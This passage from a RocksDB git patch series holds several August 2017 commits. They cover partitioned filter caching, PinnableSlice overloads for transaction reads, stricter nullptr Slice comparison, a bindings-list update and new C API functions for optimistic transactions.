filter_cache_.find(fltr_blk_handle.offset()); - if (iter != filter_cache_.end()) { + if (filter_map_.size() != 0) { + auto iter = filter_map_.find(fltr_blk_handle.offset()); + // This is a possible scenario since block cache might not have had space + // for the partition + if (iter != filter_map_.end()) { + PERF_COUNTER_ADD(block_cache_hit_count, 1); RecordTick(statistics(), BLOCK_CACHE_FILTER_HIT); + RecordTick(statistics(), BLOCK_CACHE_HIT); + RecordTick(statistics(), BLOCK_CACHE_BYTES_READ, + block_cache->GetUsage(iter->second.cache_handle)); *cached = true; - return {iter->second, nullptr}; - } - } - auto filter = - table_->GetFilter(fltr_blk_handle, is_a_filter_partition, no_io); - if (filter.IsSet()) { - WriteLock wl(&mu_); - filter_block_set_.insert(fltr_blk_handle); - if (pin_cached_filters) { - std::pair<uint64_t, FilterBlockReader*> pair(fltr_blk_handle.offset(), - filter.value); - auto succ = filter_cache_.insert(pair).second; - if (succ) { - handle_list_.push_back(filter.cache_handle); - } // Otherwise it is already inserted by a concurrent thread - *cached = true; + return iter->second; } } - return filter; + return table_->GetFilter(/*prefetch_buffer*/ nullptr, fltr_blk_handle, + is_a_filter_partition, no_io); } else { auto filter = table_->ReadFilter(prefetch_buffer, fltr_blk_handle, is_a_filter_partition); @@ -244,4 +243,69 @@ size_t PartitionedFilterBlockReader::ApproximateMemoryUsage() const { return idx_on_fltr_blk_->size(); } +// TODO(myabandeh): merge this with the same function in IndexReader +void PartitionedFilterBlockReader::CacheDependencies(bool pin) { + // Before reading partitions, prefetch them to avoid lots of IOs + auto rep = table_->rep_; + BlockIter biter; + BlockHandle handle; + idx_on_fltr_blk_->NewIterator(&comparator_, &biter, true); + // Index partitions are assumed to be consecutive. Prefetch them all.
+ // Read the first block offset + biter.SeekToFirst(); + Slice input = biter.value(); + Status s = handle.DecodeFrom(&input); + assert(s.ok()); + if (!s.ok()) { + ROCKS_LOG_WARN(rep->ioptions.info_log, + "Could not read first index partition"); + return; + } + uint64_t prefetch_off = handle.offset(); + + // Read the last block's offset + biter.SeekToLast(); + input = biter.value(); + s = handle.DecodeFrom(&input); + assert(s.ok()); + if (!s.ok()) { + ROCKS_LOG_WARN(rep->ioptions.info_log, + "Could not read last index partition"); + return; + } + uint64_t last_off = handle.offset() + handle.size() + kBlockTrailerSize; + uint64_t prefetch_len = last_off - prefetch_off; + std::unique_ptr prefetch_buffer; + auto& file = table_->rep_->file; + prefetch_buffer.reset(new FilePrefetchBuffer()); + s = prefetch_buffer->Prefetch(file.get(), prefetch_off, prefetch_len); + + // After prefetch, read the partitions one by one + biter.SeekToFirst(); + Cache* block_cache = rep->table_options.block_cache.get(); + for (; biter.Valid(); biter.Next()) { + input = biter.value(); + s = handle.DecodeFrom(&input); + assert(s.ok()); + if (!s.ok()) { + ROCKS_LOG_WARN(rep->ioptions.info_log, "Could not read index partition"); + continue; + } + + const bool no_io = true; + const bool is_a_filter_partition = true; + auto filter = table_->GetFilter(prefetch_buffer.get(), handle, + is_a_filter_partition, !no_io); + if (LIKELY(filter.IsSet())) { + if (pin) { + filter_map_[handle.offset()] = std::move(filter); + } else { + block_cache->Release(filter.cache_handle); + } + } else { + delete filter.value; + } + } +} + } // namespace rocksdb diff --git a/table/partitioned_filter_block.h b/table/partitioned_filter_block.h index d408175390f..1a00a86e6ce 100644 --- a/table/partitioned_filter_block.h +++ b/table/partitioned_filter_block.h @@ -88,20 +88,15 @@ class PartitionedFilterBlockReader : public FilterBlockReader { BlockBasedTable::CachableEntry GetFilterPartition( FilePrefetchBuffer* prefetch_buffer, Slice* handle, const bool no_io, bool* cached); + virtual void CacheDependencies(bool pin) override; const SliceTransform* prefix_extractor_; std::unique_ptr idx_on_fltr_blk_; const Comparator& comparator_; const BlockBasedTable* table_; - std::unordered_map filter_cache_; - autovector handle_list_; - struct BlockHandleCmp { - bool operator()(const BlockHandle& lhs, const BlockHandle& rhs) const { - return lhs.offset() < rhs.offset(); - } - }; - std::set filter_block_set_; - port::RWMutex mu_; + std::unordered_map> + filter_map_; }; } // namespace rocksdb diff --git a/table/partitioned_filter_block_test.cc b/table/partitioned_filter_block_test.cc index a49143dae2f..1bc529ed974 100644 --- a/table/partitioned_filter_block_test.cc +++ b/table/partitioned_filter_block_test.cc @@ -22,11 +22,14 @@ std::map slices; class MockedBlockBasedTable : public BlockBasedTable { public: - explicit MockedBlockBasedTable(Rep* rep) : BlockBasedTable(rep) {} + explicit MockedBlockBasedTable(Rep* rep) : BlockBasedTable(rep) { + // Initialize what Open normally does as much as necessary for the test + rep->cache_key_prefix_size = 10; + } virtual CachableEntry GetFilter( - const BlockHandle& filter_blk_handle, const bool is_a_filter_partition, - bool no_io) const override { + FilePrefetchBuffer*, const BlockHandle& filter_blk_handle, + const bool /* unused */, bool /* unused */) const override { Slice slice = slices[filter_blk_handle.offset()]; auto obj = new FullFilterBlockReader( nullptr, true, BlockContents(slice, false, kNoCompression), From 
ccf7f833e320c8a5c7d531ca81f3a79c8a5acd20 Mon Sep 17 00:00:00 2001 From: Maysam Yabandeh Date: Wed, 23 Aug 2017 10:01:17 -0700 Subject: [PATCH 141/205] Use PinnableSlice in Transactions Summary: The ::Get from DB is already augmented with an overload method that takes a PinnableSlice instead of a string. Transactions however are not yet upgraded to use the new API. As a result, transaction users such as MyRocks cannot benefit from it. This patch updates the transactional API with a PinnableSlice overload. Closes https://github.com/facebook/rocksdb/pull/2736 Differential Revision: D5645770 Pulled By: maysamyabandeh fbshipit-source-id: f6af520df902f842de1bcf99bed3e8dfc43ad96d --- include/rocksdb/utilities/transaction.h | 34 +++++++++++ .../utilities/write_batch_with_index.h | 10 ++++ utilities/transactions/transaction_base.cc | 36 +++++++++++- utilities/transactions/transaction_base.h | 9 +++ .../write_batch_with_index.cc | 56 +++++++++++++++---- 5 files changed, 132 insertions(+), 13 deletions(-) diff --git a/include/rocksdb/utilities/transaction.h b/include/rocksdb/utilities/transaction.h index 8507ef133fb..a3519739c21 100644 --- a/include/rocksdb/utilities/transaction.h +++ b/include/rocksdb/utilities/transaction.h @@ -169,8 +169,26 @@ class Transaction { ColumnFamilyHandle* column_family, const Slice& key, std::string* value) = 0; + // An overload of the above method that receives a PinnableSlice + // For backward compatibility a default implementation is provided + virtual Status Get(const ReadOptions& options, + ColumnFamilyHandle* column_family, const Slice& key, + PinnableSlice* pinnable_val) { + assert(pinnable_val != nullptr); + auto s = Get(options, column_family, key, pinnable_val->GetSelf()); + pinnable_val->PinSelf(); + return s; + } + virtual Status Get(const ReadOptions& options, const Slice& key, std::string* value) = 0; + virtual Status Get(const ReadOptions& options, const Slice& key, + PinnableSlice* pinnable_val) { + assert(pinnable_val != nullptr); + auto s = Get(options, key, pinnable_val->GetSelf()); + pinnable_val->PinSelf(); + return s; + } virtual std::vector<Status> MultiGet( const ReadOptions& options, @@ -212,6 +230,22 @@ class Transaction { const Slice& key, std::string* value, bool exclusive = true) = 0; + // An overload of the above method that receives a PinnableSlice + // For backward compatibility a default implementation is provided + virtual Status GetForUpdate(const ReadOptions& options, + ColumnFamilyHandle* column_family, + const Slice& key, PinnableSlice* pinnable_val, + bool exclusive = true) { + if (pinnable_val == nullptr) { + std::string* null_str = nullptr; + return GetForUpdate(options, key, null_str); + } else { + auto s = GetForUpdate(options, key, pinnable_val->GetSelf()); + pinnable_val->PinSelf(); + return s; + } + } + virtual Status GetForUpdate(const ReadOptions& options, const Slice& key, std::string* value, bool exclusive = true) = 0; diff --git a/include/rocksdb/utilities/write_batch_with_index.h b/include/rocksdb/utilities/write_batch_with_index.h index 38809e1c781..24d8f30aa51 100644 --- a/include/rocksdb/utilities/write_batch_with_index.h +++ b/include/rocksdb/utilities/write_batch_with_index.h @@ -186,10 +186,20 @@ class WriteBatchWithIndex : public WriteBatchBase { // regardless).
Status GetFromBatchAndDB(DB* db, const ReadOptions& read_options, const Slice& key, std::string* value); + + // An overload of the above method that receives a PinnableSlice + Status GetFromBatchAndDB(DB* db, const ReadOptions& read_options, + const Slice& key, PinnableSlice* value); + Status GetFromBatchAndDB(DB* db, const ReadOptions& read_options, ColumnFamilyHandle* column_family, const Slice& key, std::string* value); + // An overload of the above method that receives a PinnableSlice + Status GetFromBatchAndDB(DB* db, const ReadOptions& read_options, + ColumnFamilyHandle* column_family, const Slice& key, + PinnableSlice* value); + // Records the state of the batch for future calls to RollbackToSavePoint(). // May be called multiple times to set multiple save points. void SetSavePoint() override; diff --git a/utilities/transactions/transaction_base.cc b/utilities/transactions/transaction_base.cc index 0357c113f23..4612dfa5497 100644 --- a/utilities/transactions/transaction_base.cc +++ b/utilities/transactions/transaction_base.cc @@ -181,8 +181,21 @@ Status TransactionBaseImpl::RollbackToSavePoint() { Status TransactionBaseImpl::Get(const ReadOptions& read_options, ColumnFamilyHandle* column_family, const Slice& key, std::string* value) { + assert(value != nullptr); + PinnableSlice pinnable_val(value); + assert(!pinnable_val.IsPinned()); + auto s = Get(read_options, column_family, key, &pinnable_val); + if (s.ok() && pinnable_val.IsPinned()) { + value->assign(pinnable_val.data(), pinnable_val.size()); + } // else value is already assigned + return s; +} + +Status TransactionBaseImpl::Get(const ReadOptions& read_options, + ColumnFamilyHandle* column_family, + const Slice& key, PinnableSlice* pinnable_val) { return write_batch_.GetFromBatchAndDB(db_, read_options, column_family, key, - value); + pinnable_val); } Status TransactionBaseImpl::GetForUpdate(const ReadOptions& read_options, @@ -192,7 +205,26 @@ Status TransactionBaseImpl::GetForUpdate(const ReadOptions& read_options, Status s = TryLock(column_family, key, true /* read_only */, exclusive); if (s.ok() && value != nullptr) { - s = Get(read_options, column_family, key, value); + assert(value != nullptr); + PinnableSlice pinnable_val(value); + assert(!pinnable_val.IsPinned()); + s = Get(read_options, column_family, key, &pinnable_val); + if (s.ok() && pinnable_val.IsPinned()) { + value->assign(pinnable_val.data(), pinnable_val.size()); + } // else value is already assigned + } + return s; +} + +Status TransactionBaseImpl::GetForUpdate(const ReadOptions& read_options, + ColumnFamilyHandle* column_family, + const Slice& key, + PinnableSlice* pinnable_val, + bool exclusive) { + Status s = TryLock(column_family, key, true /* read_only */, exclusive); + + if (s.ok() && pinnable_val != nullptr) { + s = Get(read_options, column_family, key, pinnable_val); } return s; } diff --git a/utilities/transactions/transaction_base.h b/utilities/transactions/transaction_base.h index 1514836489e..c73b329f400 100644 --- a/utilities/transactions/transaction_base.h +++ b/utilities/transactions/transaction_base.h @@ -46,18 +46,27 @@ class TransactionBaseImpl : public Transaction { Status RollbackToSavePoint() override; + using Transaction::Get; Status Get(const ReadOptions& options, ColumnFamilyHandle* column_family, const Slice& key, std::string* value) override; + Status Get(const ReadOptions& options, ColumnFamilyHandle* column_family, + const Slice& key, PinnableSlice* value) override; + Status Get(const ReadOptions& options, const Slice& key,
std::string* value) override { return Get(options, db_->DefaultColumnFamily(), key, value); } + using Transaction::GetForUpdate; Status GetForUpdate(const ReadOptions& options, ColumnFamilyHandle* column_family, const Slice& key, std::string* value, bool exclusive) override; + Status GetForUpdate(const ReadOptions& options, + ColumnFamilyHandle* column_family, const Slice& key, + PinnableSlice* pinnable_val, bool exclusive) override; + Status GetForUpdate(const ReadOptions& options, const Slice& key, std::string* value, bool exclusive) override { return GetForUpdate(options, db_->DefaultColumnFamily(), key, value, diff --git a/utilities/write_batch_with_index/write_batch_with_index.cc b/utilities/write_batch_with_index/write_batch_with_index.cc index dc5d0fcf60f..b2820109cc8 100644 --- a/utilities/write_batch_with_index/write_batch_with_index.cc +++ b/utilities/write_batch_with_index/write_batch_with_index.cc @@ -385,8 +385,8 @@ class WBWIIteratorImpl : public WBWIIterator { }; struct WriteBatchWithIndex::Rep { - Rep(const Comparator* index_comparator, size_t reserved_bytes = 0, - size_t max_bytes = 0, bool _overwrite_key = false) + explicit Rep(const Comparator* index_comparator, size_t reserved_bytes = 0, + size_t max_bytes = 0, bool _overwrite_key = false) : write_batch(reserved_bytes, max_bytes), comparator(index_comparator, &write_batch), skip_list(comparator, &arena), @@ -743,8 +743,23 @@ Status WriteBatchWithIndex::GetFromBatchAndDB(DB* db, const ReadOptions& read_options, const Slice& key, std::string* value) { + assert(value != nullptr); + PinnableSlice pinnable_val(value); + assert(!pinnable_val.IsPinned()); + auto s = GetFromBatchAndDB(db, read_options, db->DefaultColumnFamily(), key, + &pinnable_val); + if (s.ok() && pinnable_val.IsPinned()) { + value->assign(pinnable_val.data(), pinnable_val.size()); + } // else value is already assigned + return s; +} + +Status WriteBatchWithIndex::GetFromBatchAndDB(DB* db, + const ReadOptions& read_options, + const Slice& key, + PinnableSlice* pinnable_val) { return GetFromBatchAndDB(db, read_options, db->DefaultColumnFamily(), key, - value); + pinnable_val); } Status WriteBatchWithIndex::GetFromBatchAndDB(DB* db, @@ -752,19 +767,38 @@ Status WriteBatchWithIndex::GetFromBatchAndDB(DB* db, ColumnFamilyHandle* column_family, const Slice& key, std::string* value) { + assert(value != nullptr); + PinnableSlice pinnable_val(value); + assert(!pinnable_val.IsPinned()); + auto s = + GetFromBatchAndDB(db, read_options, column_family, key, &pinnable_val); + if (s.ok() && pinnable_val.IsPinned()) { + value->assign(pinnable_val.data(), pinnable_val.size()); + } // else value is already assigned + return s; +} + +Status WriteBatchWithIndex::GetFromBatchAndDB(DB* db, + const ReadOptions& read_options, + ColumnFamilyHandle* column_family, + const Slice& key, + PinnableSlice* pinnable_val) { Status s; MergeContext merge_context; const ImmutableDBOptions& immuable_db_options = reinterpret_cast(db)->immutable_db_options(); - std::string batch_value; + // Since the lifetime of the WriteBatch is the same as that of the transaction + // we cannot pin it as otherwise the returned value will not be available + // after the transaction finishes. 
+ std::string& batch_value = *pinnable_val->GetSelf(); WriteBatchWithIndexInternal::Result result = WriteBatchWithIndexInternal::GetFromBatch( immuable_db_options, this, column_family, key, &merge_context, &rep->comparator, &batch_value, rep->overwrite_key, &s); if (result == WriteBatchWithIndexInternal::Result::kFound) { - value->assign(batch_value.data(), batch_value.size()); + pinnable_val->PinSelf(); return s; } if (result == WriteBatchWithIndexInternal::Result::kDeleted) { @@ -785,7 +819,7 @@ Status WriteBatchWithIndex::GetFromBatchAndDB(DB* db, result == WriteBatchWithIndexInternal::Result::kNotFound); // Did not find key in batch OR could not resolve Merges. Try DB. - s = db->Get(read_options, column_family, key, value); + s = db->Get(read_options, column_family, key, pinnable_val); if (s.ok() || s.IsNotFound()) { // DB Get Succeeded if (result == WriteBatchWithIndexInternal::Result::kMergeInProgress) { @@ -797,18 +831,18 @@ Status WriteBatchWithIndex::GetFromBatchAndDB(DB* db, Env* env = immuable_db_options.env; Logger* logger = immuable_db_options.info_log.get(); - Slice db_slice(*value); Slice* merge_data; if (s.ok()) { - merge_data = &db_slice; + merge_data = pinnable_val; } else { // Key not present in db (s.IsNotFound()) merge_data = nullptr; } if (merge_operator) { - s = MergeHelper::TimedFullMerge(merge_operator, key, merge_data, - merge_context.GetOperands(), value, - logger, statistics, env); + s = MergeHelper::TimedFullMerge( + merge_operator, key, merge_data, merge_context.GetOperands(), + pinnable_val->GetSelf(), logger, statistics, env); + pinnable_val->PinSelf(); } else { s = Status::InvalidArgument("Options::merge_operator must be set"); } From 234f33a3f9154f2d81ef72bd0165e1bf064c2c5a Mon Sep 17 00:00:00 2001 From: Andrew Kryczka Date: Wed, 23 Aug 2017 10:45:17 -0700 Subject: [PATCH 142/205] allow nullptr Slice only as sentinel Summary: Allow `Slice` holding nullptr as a sentinel value but not in comparisons. This new restriction eliminates the need for the manual checks in 39ef900551a4d88c8546ca086baaba76730e6162, while still conforming to glibc's `memcmp` API. Thanks siying for the idea. Users may need to migrate, so mentioned it in HISTORY.md. Closes https://github.com/facebook/rocksdb/pull/2777 Differential Revision: D5686016 Pulled By: ajkr fbshipit-source-id: 03a2ca3fd9a0ebade9d0d5686c81d59a9534f563 --- HISTORY.md | 1 + include/rocksdb/slice.h | 10 +--------- table/cuckoo_table_builder_test.cc | 6 +++++- utilities/merge_operators/max.cc | 2 ++ 4 files changed, 9 insertions(+), 10 deletions(-) diff --git a/HISTORY.md b/HISTORY.md index a40a3b8926b..a63d9d62861 100644 --- a/HISTORY.md +++ b/HISTORY.md @@ -2,6 +2,7 @@ ## Unreleased ### Public API Change * Users of `Statistics::getHistogramString()` will see fewer histogram buckets and different bucket endpoints. +* `Slice::compare` and BytewiseComparator `Compare` no longer accept `Slice`s containing nullptr. ### New Features * Add Iterator::Refresh(), which allows users to update the iterator state so that they can avoid some initialization costs of recreating iterators. diff --git a/include/rocksdb/slice.h b/include/rocksdb/slice.h index ec33c97e632..1630803b9fd 100644 --- a/include/rocksdb/slice.h +++ b/include/rocksdb/slice.h @@ -214,16 +214,8 @@ inline bool operator!=(const Slice& x, const Slice& y) { } inline int Slice::compare(const Slice& b) const { - const size_t min_len = (size_ < b.size_) ? 
size_ : b.size_; - if (min_len == 0) { - if (size_ > 0) { - return 1; - } else if (b.size_ > 0) { - return -1; - } - return 0; - } assert(data_ != nullptr && b.data_ != nullptr); + const size_t min_len = (size_ < b.size_) ? size_ : b.size_; int r = memcmp(data_, b.data_, min_len); if (r == 0) { if (size_ < b.size_) r = -1; diff --git a/table/cuckoo_table_builder_test.cc b/table/cuckoo_table_builder_test.cc index ec282b4b540..93daaca472b 100644 --- a/table/cuckoo_table_builder_test.cc +++ b/table/cuckoo_table_builder_test.cc @@ -109,7 +109,11 @@ class CuckooBuilderTest : public testing::Test { expected_locations.begin(); if (key_idx == keys.size()) { // i is not one of the expected locations. Empty bucket. - ASSERT_EQ(read_slice.compare(expected_unused_bucket), 0); + if (read_slice.data() == nullptr) { + ASSERT_EQ(0, expected_unused_bucket.size()); + } else { + ASSERT_EQ(read_slice.compare(expected_unused_bucket), 0); + } } else { keys_found[key_idx] = true; ASSERT_EQ(read_slice.compare(keys[key_idx] + values[key_idx]), 0); diff --git a/utilities/merge_operators/max.cc b/utilities/merge_operators/max.cc index 06e233fe89d..5f42e816ef7 100644 --- a/utilities/merge_operators/max.cc +++ b/utilities/merge_operators/max.cc @@ -25,6 +25,8 @@ class MaxOperator : public MergeOperator { if (merge_in.existing_value) { max = Slice(merge_in.existing_value->data(), merge_in.existing_value->size()); + } else if (max.data() == nullptr) { + max = Slice(); } for (const auto& op : merge_in.operand_list) { From 90177432e4029b5d5350e66f7b4ff1a9ca5cf47e Mon Sep 17 00:00:00 2001 From: Andres Suarez Date: Wed, 23 Aug 2017 12:02:06 -0700 Subject: [PATCH 143/205] Remove leftover references to phutil_module_cache Reviewed By: mzlee Differential Revision: D5688624 fbshipit-source-id: c726b4e56bd823b994a7b713488fef93c6f796d0 --- .gitignore | 1 - 1 file changed, 1 deletion(-) diff --git a/.gitignore b/.gitignore index 87d5b98a453..03b805983ad 100644 --- a/.gitignore +++ b/.gitignore @@ -39,7 +39,6 @@ coverage/COVERAGE_REPORT .gdbhistory .gdb_history package/ -.phutil_module_cache unity.a tags etags From c10b3913149d432fc4c0a5e82d3413f2a06da53f Mon Sep 17 00:00:00 2001 From: BH1XUW Date: Wed, 23 Aug 2017 12:10:37 -0700 Subject: [PATCH 144/205] LANGUAGE-BINDINGS.md: add another rust binding MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Summary: I made another rust binding. 👻 * Use C++ API (instead of C API) * Try to follow [Rust Guidelines](https://aturon.github.io/README.html) * Working in progress (the APIs are not stable yet) Closes https://github.com/facebook/rocksdb/pull/2438 Differential Revision: D5690612 Pulled By: siying fbshipit-source-id: 11d3956c33b5e5366555afbf3786b782be3046e7 --- LANGUAGE-BINDINGS.md | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/LANGUAGE-BINDINGS.md b/LANGUAGE-BINDINGS.md index d28035bf816..8084b6c3019 100644 --- a/LANGUAGE-BINDINGS.md +++ b/LANGUAGE-BINDINGS.md @@ -9,5 +9,7 @@ This is the list of all known third-party language bindings for RocksDB. 
If some * Haskell - https://hackage.haskell.org/package/rocksdb-haskell * PHP - https://github.com/Photonios/rocksdb-php * C# - https://github.com/warrenfalk/rocksdb-sharp -* Rust - https://github.com/spacejam/rust-rocksdb +* Rust + * https://github.com/spacejam/rust-rocksdb + * https://github.com/bh1xuw/rust-rocks * D programming language - https://github.com/b1naryth1ef/rocksdb From a12479819d19997e386597711b316b00c1402582 Mon Sep 17 00:00:00 2001 From: mkosieradzki Date: Wed, 23 Aug 2017 12:32:42 -0700 Subject: [PATCH 145/205] Improved transactions support in C API Summary: Solves #2632 Added OptimisticTransactionDB to the C API. Added missing merge operations to Transaction. Added missing get_for_update operation to transaction If required I will create tests for this another day. Closes https://github.com/facebook/rocksdb/pull/2633 Differential Revision: D5600906 Pulled By: yiwu-arbug fbshipit-source-id: da23e4484433d8f59d471f778ff2ae210e3fe4eb --- db/c.cc | 123 ++++++++++++++++++++++++++++++++++++++++++-- include/rocksdb/c.h | 48 +++++++++++++++++ 2 files changed, 166 insertions(+), 5 deletions(-) diff --git a/db/c.cc b/db/c.cc index 788eab68afb..cbfb8557d0d 100644 --- a/db/c.cc +++ b/db/c.cc @@ -36,6 +36,7 @@ #include "utilities/merge_operators.h" #include "rocksdb/utilities/transaction.h" #include "rocksdb/utilities/transaction_db.h" +#include "rocksdb/utilities/optimistic_transaction_db.h" #include "rocksdb/utilities/checkpoint.h" using rocksdb::BytewiseComparator; @@ -95,6 +96,8 @@ using rocksdb::PinnableSlice; using rocksdb::TransactionDBOptions; using rocksdb::TransactionDB; using rocksdb::TransactionOptions; +using rocksdb::OptimisticTransactionDB; +using rocksdb::OptimisticTransactionOptions; using rocksdb::Transaction; using rocksdb::Checkpoint; @@ -153,6 +156,12 @@ struct rocksdb_transaction_t { struct rocksdb_checkpoint_t { Checkpoint* rep; }; +struct rocksdb_optimistictransactiondb_t { + OptimisticTransactionDB* rep; +}; +struct rocksdb_optimistictransaction_options_t { + OptimisticTransactionOptions rep; +}; struct rocksdb_compactionfiltercontext_t { CompactionFilter::Context rep; @@ -3253,6 +3262,21 @@ void rocksdb_transaction_options_set_max_write_batch_size( opt->rep.max_write_batch_size = size; } +rocksdb_optimistictransaction_options_t* +rocksdb_optimistictransaction_options_create() { + return new rocksdb_optimistictransaction_options_t; +} + +void rocksdb_optimistictransaction_options_destroy( + rocksdb_optimistictransaction_options_t* opt) { + delete opt; +} + +void rocksdb_optimistictransaction_options_set_set_snapshot( + rocksdb_optimistictransaction_options_t* opt, unsigned char v) { + opt->rep.set_snapshot = v; +} + rocksdb_column_family_handle_t* rocksdb_transactiondb_create_column_family( rocksdb_transactiondb_t* txn_db, const rocksdb_options_t* column_family_options, @@ -3320,7 +3344,14 @@ void rocksdb_transaction_destroy(rocksdb_transaction_t* txn) { delete txn; } -//Read a key inside a transaction +const rocksdb_snapshot_t* rocksdb_transaction_get_snapshot( + rocksdb_transaction_t* txn) { + rocksdb_snapshot_t* result = new rocksdb_snapshot_t; + result->rep = txn->rep->GetSnapshot(); + return result; +} + +// Read a key inside a transaction char* rocksdb_transaction_get(rocksdb_transaction_t* txn, const rocksdb_readoptions_t* options, const char* key, size_t klen, size_t* vlen, @@ -3361,6 +3392,28 @@ char* rocksdb_transaction_get_cf(rocksdb_transaction_t* txn, return result; } +// Read a key inside a transaction +char* 
rocksdb_transaction_get_for_update(rocksdb_transaction_t* txn, + const rocksdb_readoptions_t* options, + const char* key, size_t klen, + size_t* vlen, unsigned char exclusive, + char** errptr) { + char* result = nullptr; + std::string tmp; + Status s = + txn->rep->GetForUpdate(options->rep, Slice(key, klen), &tmp, exclusive); + if (s.ok()) { + *vlen = tmp.size(); + result = CopyString(tmp); + } else { + *vlen = 0; + if (!s.IsNotFound()) { + SaveError(errptr, s); + } + } + return result; +} + // Read a key outside a transaction char* rocksdb_transactiondb_get( rocksdb_transactiondb_t* txn_db, @@ -3418,13 +3471,13 @@ void rocksdb_transaction_put_cf(rocksdb_transaction_t* txn, Slice(val, vlen))); } -//Put a key outside a transaction +// Put a key outside a transaction void rocksdb_transactiondb_put(rocksdb_transactiondb_t* txn_db, const rocksdb_writeoptions_t* options, const char* key, size_t klen, const char* val, size_t vlen, char** errptr) { - SaveError(errptr, - txn_db->rep->Put(options->rep, Slice(key, klen), Slice(val, vlen))); + SaveError(errptr, txn_db->rep->Put(options->rep, Slice(key, klen), + Slice(val, vlen))); } void rocksdb_transactiondb_put_cf(rocksdb_transactiondb_t* txn_db, @@ -3437,7 +3490,7 @@ void rocksdb_transactiondb_put_cf(rocksdb_transactiondb_t* txn_db, Slice(key, keylen), Slice(val, vallen))); } -//Write batch into transaction db +// Write batch into transaction db void rocksdb_transactiondb_write( rocksdb_transactiondb_t* db, const rocksdb_writeoptions_t* options, @@ -3446,6 +3499,22 @@ void rocksdb_transactiondb_write( SaveError(errptr, db->rep->Write(options->rep, &batch->rep)); } +// Merge a key inside a transaction +void rocksdb_transaction_merge(rocksdb_transaction_t* txn, const char* key, + size_t klen, const char* val, size_t vlen, + char** errptr) { + SaveError(errptr, txn->rep->Merge(Slice(key, klen), Slice(val, vlen))); +} + +// Merge a key outside a transaction +void rocksdb_transactiondb_merge(rocksdb_transactiondb_t* txn_db, + const rocksdb_writeoptions_t* options, + const char* key, size_t klen, const char* val, + size_t vlen, char** errptr) { + SaveError(errptr, + txn_db->rep->Merge(options->rep, Slice(key, klen), Slice(val, vlen))); +} + // Delete a key inside a transaction void rocksdb_transaction_delete(rocksdb_transaction_t* txn, const char* key, size_t klen, char** errptr) { @@ -3481,6 +3550,14 @@ rocksdb_iterator_t* rocksdb_transaction_create_iterator( return result; } +// Create an iterator outside a transaction +rocksdb_iterator_t* rocksdb_transactiondb_create_iterator( + rocksdb_transactiondb_t* txn_db, const rocksdb_readoptions_t* options) { + rocksdb_iterator_t* result = new rocksdb_iterator_t; + result->rep = txn_db->rep->NewIterator(options->rep); + return result; +} + void rocksdb_transactiondb_close(rocksdb_transactiondb_t* txn_db) { delete txn_db->rep; delete txn_db; @@ -3497,6 +3574,42 @@ rocksdb_checkpoint_t* rocksdb_transactiondb_checkpoint_object_create( return result; } +rocksdb_optimistictransactiondb_t* rocksdb_optimistictransactiondb_open( + const rocksdb_options_t* options, const char* name, + char** errptr) { + OptimisticTransactionDB* otxn_db; + if (SaveError(errptr, OptimisticTransactionDB::Open( + options->rep, std::string(name), &otxn_db))) { + return nullptr; + } + rocksdb_optimistictransactiondb_t* result = + new rocksdb_optimistictransactiondb_t; + result->rep = otxn_db; + return result; +} + +rocksdb_transaction_t* rocksdb_optimistictransaction_begin( + rocksdb_optimistictransactiondb_t* otxn_db, + const 
rocksdb_writeoptions_t* write_options, + const rocksdb_optimistictransaction_options_t* otxn_options, + rocksdb_transaction_t* old_txn) { + if (old_txn == nullptr) { + rocksdb_transaction_t* result = new rocksdb_transaction_t; + result->rep = otxn_db->rep->BeginTransaction(write_options->rep, + otxn_options->rep, nullptr); + return result; + } + old_txn->rep = otxn_db->rep->BeginTransaction( + write_options->rep, otxn_options->rep, old_txn->rep); + return old_txn; +} + +void rocksdb_optimistictransactiondb_close( + rocksdb_optimistictransactiondb_t* otxn_db) { + delete otxn_db->rep; + delete otxn_db; +} + void rocksdb_free(void* ptr) { free(ptr); } rocksdb_pinnableslice_t* rocksdb_get_pinned( diff --git a/include/rocksdb/c.h b/include/rocksdb/c.h index 838d7b0c951..2269f7261ca 100644 --- a/include/rocksdb/c.h +++ b/include/rocksdb/c.h @@ -117,6 +117,8 @@ typedef struct rocksdb_pinnableslice_t rocksdb_pinnableslice_t; typedef struct rocksdb_transactiondb_options_t rocksdb_transactiondb_options_t; typedef struct rocksdb_transactiondb_t rocksdb_transactiondb_t; typedef struct rocksdb_transaction_options_t rocksdb_transaction_options_t; +typedef struct rocksdb_optimistictransactiondb_t rocksdb_optimistictransactiondb_t; +typedef struct rocksdb_optimistictransaction_options_t rocksdb_optimistictransaction_options_t; typedef struct rocksdb_transaction_t rocksdb_transaction_t; typedef struct rocksdb_checkpoint_t rocksdb_checkpoint_t; @@ -1290,6 +1292,10 @@ extern ROCKSDB_LIBRARY_API void rocksdb_transaction_rollback( extern ROCKSDB_LIBRARY_API void rocksdb_transaction_destroy( rocksdb_transaction_t* txn); +// This snapshot should be freed using rocksdb_free +extern ROCKSDB_LIBRARY_API const rocksdb_snapshot_t* +rocksdb_transaction_get_snapshot(rocksdb_transaction_t* txn); + extern ROCKSDB_LIBRARY_API char* rocksdb_transaction_get( rocksdb_transaction_t* txn, const rocksdb_readoptions_t* options, const char* key, size_t klen, size_t* vlen, char** errptr); @@ -1299,6 +1305,11 @@ extern ROCKSDB_LIBRARY_API char* rocksdb_transaction_get_cf( rocksdb_column_family_handle_t* column_family, const char* key, size_t klen, size_t* vlen, char** errptr); +extern ROCKSDB_LIBRARY_API char* rocksdb_transaction_get_for_update( + rocksdb_transaction_t* txn, const rocksdb_readoptions_t* options, + const char* key, size_t klen, size_t* vlen, unsigned char exclusive, + char** errptr); + extern ROCKSDB_LIBRARY_API char* rocksdb_transactiondb_get( rocksdb_transactiondb_t* txn_db, const rocksdb_readoptions_t* options, const char* key, size_t klen, size_t* vlen, char** errptr); @@ -1329,6 +1340,14 @@ extern ROCKSDB_LIBRARY_API void rocksdb_transactiondb_write( rocksdb_transactiondb_t* txn_db, const rocksdb_writeoptions_t* options, rocksdb_writebatch_t *batch, char** errptr); +extern ROCKSDB_LIBRARY_API void rocksdb_transaction_merge( + rocksdb_transaction_t* txn, const char* key, size_t klen, const char* val, + size_t vlen, char** errptr); + +extern ROCKSDB_LIBRARY_API void rocksdb_transactiondb_merge( + rocksdb_transactiondb_t* txn_db, const rocksdb_writeoptions_t* options, + const char* key, size_t klen, const char* val, size_t vlen, char** errptr); + extern ROCKSDB_LIBRARY_API void rocksdb_transaction_delete( rocksdb_transaction_t* txn, const char* key, 